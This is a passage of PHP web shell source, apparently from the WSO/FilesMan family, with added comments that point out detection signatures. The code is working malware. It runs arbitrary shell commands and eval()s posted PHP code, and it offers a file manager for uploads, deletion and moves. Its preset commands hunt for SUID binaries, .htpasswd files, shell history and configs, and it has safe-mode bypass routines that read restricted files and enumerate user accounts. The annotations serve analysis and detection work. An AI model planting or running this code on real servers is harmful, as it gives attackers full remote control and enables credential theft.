 // accumulated separately (NUL/tab/LF/CR shown as spaces in the printable column).
483 case 'hexdump':
484 $c = @file_get_contents($_POST['p1']);
485 $n = 0;
486 $h = array('00000000<br>','','');
487 $len = strlen($c);
488 for ($i=0; $i<$len; ++$i) {
489 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
490 switch ( ord($c[$i]) ) {
491 case 0: $h[2] .= ' '; break;
492 case 9: $h[2] .= ' '; break;
493 case 10: $h[2] .= ' '; break;
494 case 13: $h[2] .= ' '; break;
495 default: $h[2] .= $c[$i]; break;
496 }
497 $n++;
498 if ($n == 32) {
499 $n = 0;
500 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
501 $h[1] .= '<br>';
502 $h[2] .= "\n";
503 }
504 }
505 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
506 break;
 // rename: destination p3 may be any path, so this doubles as a move.
507 case 'rename':
508 if( !empty($_POST['p3']) ) {
509 if(!@rename($_POST['p1'], $_POST['p3']))
510 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
511 else
512 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
513 }
514 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
515 break;
 // touch: p3 parsed with strtotime(); mtime and atime are both set to it (see header note).
516 case 'touch':
517 if( !empty($_POST['p3']) ) {
518 $time = strtotime($_POST['p3']);
519 if($time) {
520 if(@touch($_POST['p1'],$time,$time))
521 die('<script>g(null,null,null,null,"")</script>');
522 else {
523 echo 'Fail!<script>document.mf.p3.value="";</script>';
524 }
525 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
526 }
527 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
528 break;
 // mkfile is handled before the header (it is rewritten to 'edit'); nothing to do here.
529 case 'mkfile':
530
531 break;
532 }
533 echo '</div>';
534 printFooter();
535}
536// File tools end ----------------------
537// Console go --------------------
// Canned commands for the Console module's dropdown, chosen by $os. Entries with an empty
// command ("Find", "Locate") are rendered as optgroup labels by actionConsole(). The preset
// descriptions show what the operator hunts for after landing: setuid/setgid binaries,
// world-writable paths, config files, .htpasswd, shell/MySQL history, mail credentials,
// backups and dumps. Detection: these description strings are stable content signatures,
// and the listed commands spawned from a web-server worker process are high-signal on the host.
538if($os == 'win')
539 $aliases = array(
540 "List Directory" => "dir",
541 "Find index.php in current dir" => "dir /s /w /b index.php",
542 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
543 "Show active connections" => "netstat -an",
544 "Show running services" => "net start",
545 "User accounts" => "net user",
546 "Show computers" => "net view",
547 "ARP Table" => "arp -a",
548 "IP Configuration" => "ipconfig /all"
549 );
550else
551 $aliases = array(
552 "List dir" => "ls -la",
553 "list file attributes on a Linux second extended file system" => "lsattr -va",
554 "show opened ports" => "netstat -an | grep -i listen",
555 "process status" => "ps aux",
556 "Find" => "",
557 "find all suid files" => "find / -type f -perm -04000 -ls",
558 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
559 "find all sgid files" => "find / -type f -perm -02000 -ls",
560 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
561 "find config.inc.php files" => "find / -type f -name config.inc.php",
562 "find config* files" => "find / -type f -name \"config*\"",
563 "find config* files in current dir" => "find . -type f -name \"config*\"",
564 "find all writable folders and files" => "find / -perm -2 -ls",
565 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
566 "find all service.pwd files" => "find / -type f -name service.pwd",
567 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
568 "find all .htpasswd files" => "find / -type f -name .htpasswd",
569 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
570 "find all .bash_history files" => "find / -type f -name .bash_history",
571 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
572 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
573 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
574 "Locate" => "",
575 "locate httpd.conf files" => "locate httpd.conf",
576 "locate vhosts.conf files" => "locate vhosts.conf",
577 "locate proftpd.conf files" => "locate proftpd.conf",
578 "locate psybnc.conf files" => "locate psybnc.conf",
579 "locate my.conf files" => "locate my.conf",
580 "locate admin.php files" =>"locate admin.php",
581 "locate cfg.php files" => "locate cfg.php",
582 "locate conf.php files" => "locate conf.php",
583 "locate config.dat files" => "locate config.dat",
584 "locate config.php files" => "locate config.php",
585 "locate config.inc files" => "locate config.inc",
586 "locate config.inc.php" => "locate config.inc.php",
587 "locate config.default.php files" => "locate config.default.php",
588 "locate config* files " => "locate config",
589 "locate .conf files"=>"locate '.conf'",
590 "locate .pwd files" => "locate '.pwd'",
591 "locate .sql files" => "locate '.sql'",
592 "locate .htpasswd files" => "locate '.htpasswd'",
593 "locate .bash_history files" => "locate '.bash_history'",
594 "locate .mysql_history files" => "locate '.mysql_history'",
595 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
596 "locate backup files" => "locate backup",
597 "locate dump files" => "locate dump",
598 "locate priv files" => "locate priv"
599 );
600
// "Console" module: runs p1 through ex(). A non-empty p2 appends ' 2>&1' so stderr is
// captured too; the checkbox states are remembered in session keys suffixed
// 'stderr_to_out' and 'ajax'. With 'ajax' set, the reply is the length-prefixed JavaScript
// that processReqChange() eval()s: it clears the input, appends "$ cmd\n<output>" (converted
// to UTF-8 from the page charset) to the output textarea, and, if the command ends in
// 'cd <dir>', also chdir()s the PHP worker and updates the hidden c field. Without ajax the
// full page is rendered and the output goes into the textarea via htmlspecialchars().
// Detection: the 'stderr_to_out' session key and the "document.cf.output.value+=" fragment
// in responses are specific to this family.
601function actionConsole() {
602 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
603 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
604 $_POST['p1'] .= ' 2>&1';
605 } elseif(!empty($_POST['p1']))
606 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = 0;
607
 // AJAX reply path; output is built in a buffer so its byte length can be prefixed.
608 if(isset($_POST['ajax'])) {
609 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
610 ob_start();
611 echo "document.cf.cmd.value='';\n";
612 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
 // Keep the shell's cwd in sync with a trailing 'cd' so later commands run there; the new
 // path is written into a JS string without escaping.
613 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
614 if(@chdir($match[1])) {
615 $GLOBALS['cwd'] = @getcwd();
616 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
617 }
618 }
619 echo "document.cf.output.value+='".$temp."';";
620 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
621 $temp = ob_get_clean();
622 echo strlen($temp), "\n", $temp;
623 exit;
624 }
625 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
626 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
627 printHeader();
 // Inline JS emitted from a PHP string: command history navigated with the up/down keys
 // (kp) and appended on submit (add).
628echo "<script>
629if(window.Event) window.captureEvents(Event.KEYDOWN);
630var cmds = new Array('');
631var cur = 0;
632function kp(e) {
633 var n = (window.Event) ? e.which : e.keyCode;
634 if(n == 38) {
635 cur--;
636 if(cur>=0)
637 document.cf.cmd.value = cmds[cur];
638 else
639 cur++;
640 } else if(n == 40) {
641 cur++;
642 if(cur < cmds.length)
643 document.cf.cmd.value = cmds[cur];
644 else
645 cur--;
646 }
647}
648function add(cmd) {
649 cmds.pop();
650 cmds.push(cmd);
651 cmds.push('');
652 cur = cmds.length-1;
653}
654</script>";
 // Form 'cf': 'clear' is handled client-side; otherwise the command goes through a() or g()
 // depending on the AJAX checkbox.
655 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
 // Alias dropdown from $GLOBALS['aliases']; empty commands become optgroup labels. Labels are not escaped.
656 foreach($GLOBALS['aliases'] as $n => $v) {
657 if($v == '') {
658 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
659 continue;
660 }
661 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
662 }
663
664 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}else{g(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
 // Synchronous path: command echo plus ex() output, HTML-escaped into the readonly textarea.
665 if(!empty($_POST['p1'])) {
666 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
667 }
668 echo '</textarea><table style="border:1px solid #000;background-color:#000;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
669 echo '</form></div><script>document.cf.cmd.focus();</script>';
670 printFooter();
671}
672// Console end --------------------
673// PHP -----------------------
// "Php" module: arbitrary PHP execution. p1 is passed to eval() in both the AJAX path and
// the page path below, and p2 == 'info' dumps phpinfo() with its CSS stripped. Mitigation:
// eval is a language construct, so disable_functions cannot remove it; file-integrity
// monitoring and static code scanning are what catch this. Detection: the literal
// eval($_POST['p1']) and the 'PhpOutput' element id are reliable static indicators.
674function actionPhp() {
 // AJAX reply: length-prefixed JS that reveals #PhpOutput and sets its innerHTML to the
 // captured output, HTML-escaped then JS-escaped.
675 if( isset($_POST['ajax']) ) {
676 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
677 ob_start();
678 eval($_POST['p1']);
679 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
680 echo strlen($temp), "\n", $temp;
681 exit;
682 }
683 printHeader();
 // phpinfo() HTML with its body/anchor CSS removed and h1 demoted to h2 so it fits the page style.
684 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
685 echo '<h1>PHP info</h1><div class=content>';
686 ob_start();
687 phpinfo();
688 $tmp = ob_get_clean();
689 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
690 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
691 $tmp = preg_replace('!h1!msiU','h2',$tmp);
692 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
693 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
694 echo $tmp;
695 echo '</div><br>';
696 }
697 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
698 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 // Code textarea (previous code re-shown escaped), AJAX checkbox and the output <pre>;
 // followed by the synchronous eval path whose captured output is HTML-escaped.
699 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
700 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
701 if(!empty($_POST['p1'])) {
702 ob_start();
703 eval($_POST['p1']);
704 echo htmlspecialchars(ob_get_clean());
705 }
706 echo '</pre></div>';
707 printFooter();
708}
709// PHP end --------------------
710// File manager go --------------------
// Handler for the "FilesMan" action: directory listing plus upload / mkdir /
// delete / copy / move operations driven by $_POST['p1'].
// Artifacts an investigator can look for: uploaded files land under the current
// working directory with the client-supplied name unchanged; copy/move state is
// kept in $_SESSION['act'], $_SESSION['f'] and $_SESSION['cwd'] between requests.
function actionFilesMan() {
    printHeader();
    echo '<h1>File manager</h1><div class=content>';
    if(isset($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                // Destination is the raw client filename, relative to the cwd set
                // by the caller's chdir($_POST['c']); no sanitisation is applied.
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
                    echo "Can't upload file!";
                break;
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                // Recursive delete; the helper is declared inside the case and is
                // therefore only defined when this branch executes.
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename($item) == ".") )
                            continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    rmdir($path);
                }
                // Selected entries arrive url-encoded in f[] (see the checkbox
                // values emitted further down).
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                // Completes a copy/move that was staged in the session by the
                // default branch below: source dir is $_SESSION['cwd'], target is
                // the current $GLOBALS['cwd'].
                if($_SESSION['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
                } elseif($_SESSION['act'] == 'move') {
                    // move_paste is declared but never called; the move itself is
                    // done with rename() in the loop below.
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
                }
                unset($_SESSION['f']);
                break;
            default:
                // 'copy' / 'move' only stage the selection; nothing touches disk
                // until a later 'paste' request.
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
                    $_SESSION['act'] = @$_POST['p1'];
                    $_SESSION['f'] = @$_POST['f'];
                    foreach($_SESSION['f'] as $k => $f)
                        $_SESSION['f'][$k] = urldecode($f);
                    $_SESSION['cwd'] = @$_POST['c'];
                }
                break;
        }
        echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
    }
    // Listing of $_POST['c'] (or the global cwd). scandir() is silenced, so an
    // unreadable directory is reported as a plain message.
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
    if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
    // Sort key/direction are encoded in p1 as "s_<column>_<0|1>" by the header links.
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
?>
<script>
 function sa() {
 for(i=0;i<document.files.elements.length;i++)
 if(document.files.elements[i].type == 'checkbox')
 document.files.elements[i].checked = document.files.elements[0].checked;
 }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = $links = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        // Owner/group are resolved via posix_*; the numeric id is shown as a
        // fallback when the lookup fails.
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
            'path' => $GLOBALS['cwd'].$dirContent[$i],
            'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
            'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
            'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
            'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
            'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
        );
        if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
            $links[] = array_merge($tmp, array('type' => 'link'));
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    // Comparator reads the sort spec through $GLOBALS because usort() cannot
    // pass extra state to a plain function.
    $GLOBALS['sort'] = $sort;
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
        else
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
    }
    usort($files, "cmp");
    usort($dirs, "cmp");
    usort($links, "cmp");
    // Directories first, then links, then files.
    $files = array_merge($dirs, $links, $files);
    $l = 0;
    foreach($files as $f) {
        // Row actions route through the client-side g() helper to the FilesTools
        // action (view / chmod / rename / touch / edit / download).
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
        $l = $l?0:1;
    }
 ?>
 <tr><td colspan=7>
 <input type=hidden name=a value='FilesMan'>
 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
 </form></table></div>
 <?php
    printFooter();
}
864// File manager end --------------------
865// String tools go --------------------
// Handler for the "StringTools" action: string/hash conversions, a recursive
// file search, and a form that posts hashes to third-party lookup sites.
// The conversion is a dynamic call $_POST['p1']($_POST['p2']) gated by an
// in_array() check against the $stringTools allow-list below.
function actionStringTools() {
    // Polyfills, only declared when the runtime lacks a function of that name.
    // NOTE: this hex2bin() (hex -> binary digit string) differs from PHP's native
    // hex2bin() (hex -> raw bytes); on runtimes that ship the native one, the
    // native behaviour is what the "HEX to BIN" entry will invoke.
    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
    // Label => callable name. Values are what the form submits in p1.
    $stringTools = array(
        'Base64 encode' => 'base64_encode',
        'Base64 decode' => 'base64_decode',
        'Url encode' => 'urlencode',
        'Url decode' => 'urldecode',
        'Full urlencode' => 'full_urlencode',
        'md5 hash' => 'md5',
        'sha1 hash' => 'sha1',
        'crypt' => 'crypt',
        'CRC32' => 'crc32',
        'ASCII to HEX' => 'ascii2hex',
        'HEX to ASCII' => 'hex2ascii',
        'HEX to DEC' => 'hexdec',
        'HEX to BIN' => 'hex2bin',
        'DEC to HEX' => 'dechex',
        'DEC to BIN' => 'decbin',
        'BIN to HEX' => 'binhex',
        'BIN to DEC' => 'bindec',
        'String to lower case' => 'strtolower',
        'String to upper case' => 'strtoupper',
        'Htmlspecialchars' => 'htmlspecialchars',
        'String length' => 'strlen',
    );
    if(isset($_POST['ajax'])) {
        // AJAX mode: same "<length>\n<script>" response framing as actionPhp,
        // targeting #strOutput instead of #PhpOutput.
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        if(in_array($_POST['p1'], $stringTools))
            echo $_POST['p1']($_POST['p2']);
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
    printHeader();
    echo '<h1>String conversions</h1><div class=content>';
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
    foreach($stringTools as $k => $v)
        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
    echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"</pre></div><br><h1>Search files:</h1><div class=content>
 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
 <tr><td></td><td><input type='submit' value='>>'></td></tr>
 </table></form>";
    // Recursive search: p3 is a glob pattern for file names, p2 an optional
    // substring that each matched file's full contents must contain (every
    // candidate file is read with file_get_contents, so this is I/O heavy on
    // large trees — a spike of reads by the web-server user is a side effect).
    function printRecursiveGlob($path) {
        if(substr($path, -1) != '/')
            $path.='/';
        $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
        if(is_array($paths)&&@count($paths)) {
            foreach($paths as $item) {
                if(@is_dir($item)){
                    if($path!=$item)
                        printRecursiveGlob($item);
                } else {
                    if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
                        echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
                }
            }
        }
    }
    if(@$_POST['p3'])
        printRecursiveGlob($_POST['c']);
    // The hash form submits to external sites; outbound browser requests to these
    // hosts from an operator's client are not server-side artifacts.
    echo "</div><br><h1>Search for hash:</h1><div class=content>
 <form method='post' target='_blank' name='hf'>
 <input type='text' name='hash' style='width:200px;'><br>
 <input type='hidden' name='act' value='find'/>
 <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
 <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
 <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
 <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
 </form></div>";
    printFooter();
}
954// String tools end --------------------
955// Safe mode go ------------------------
// Handler for the "SafeMode" action: six legacy file-read techniques selected by
// $_POST['p1'], each taking a path (or uid range) from $_POST['p2'].
// Most of these target PHP's long-removed safe_mode; on current runtimes the
// relevant controls are open_basedir, disable_functions and filesystem ACLs,
// and several branches depend on extensions (curl, imap, posix) that may be absent.
function actionSafeMode() {
    $temp='';
    ob_start();
    switch($_POST['p1']) {
        case 1:
            // Read via the compress.zlib:// stream wrapper into a temp file.
            // $test is never assigned in this function, so tempnam() receives
            // null/undefined for the directory argument.
            $temp=@tempnam($test, 'cx');
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @file_get_contents($temp);
                unlink($temp);
            } else
                echo 'Sorry... Can\'t open file';
            break;
        case 2:
            // Directory listing via glob() of "<p2>*".
            $files = glob($_POST['p2'].'*');
            if( is_array($files) )
                foreach ($files as $filename)
                    echo $filename."\n";
            break;
        case 3:
            // Read via curl's file:// handler; a NUL byte is appended before the
            // shell's own path (SELF_PATH) in the URL.
            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
            curl_exec($ch);
            break;
        case 4:
            // Resets safe_mode/open_basedir to their ini defaults, then include()s
            // the path. Output of the included file is captured by the ob_start above.
            ini_restore("safe_mode");
            ini_restore("open_basedir");
            include($_POST['p2']);
            break;
        case 5:
            // Enumerates local accounts by uid from p2 to p3 through posix_getpwuid,
            // printing each record joined with ':' (passwd-style lines).
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                $uid = @posix_getpwuid($_POST['p2']);
                if ($uid)
                    echo join(':',$uid)."\n";
            }
            break;
        case 6:
            // Read via imap_open() with the path as the mailbox spec.
            if(!function_exists('imap_open'))break;
            $stream = imap_open($_POST['p2'], "", "");
            if ($stream == FALSE)
                break;
            echo imap_body($stream, 1);
            imap_close($stream);
            break;
    }
    $temp = ob_get_clean();
    printHeader();
    echo '<h1>Safe mode bypass</h1><div class=content>';
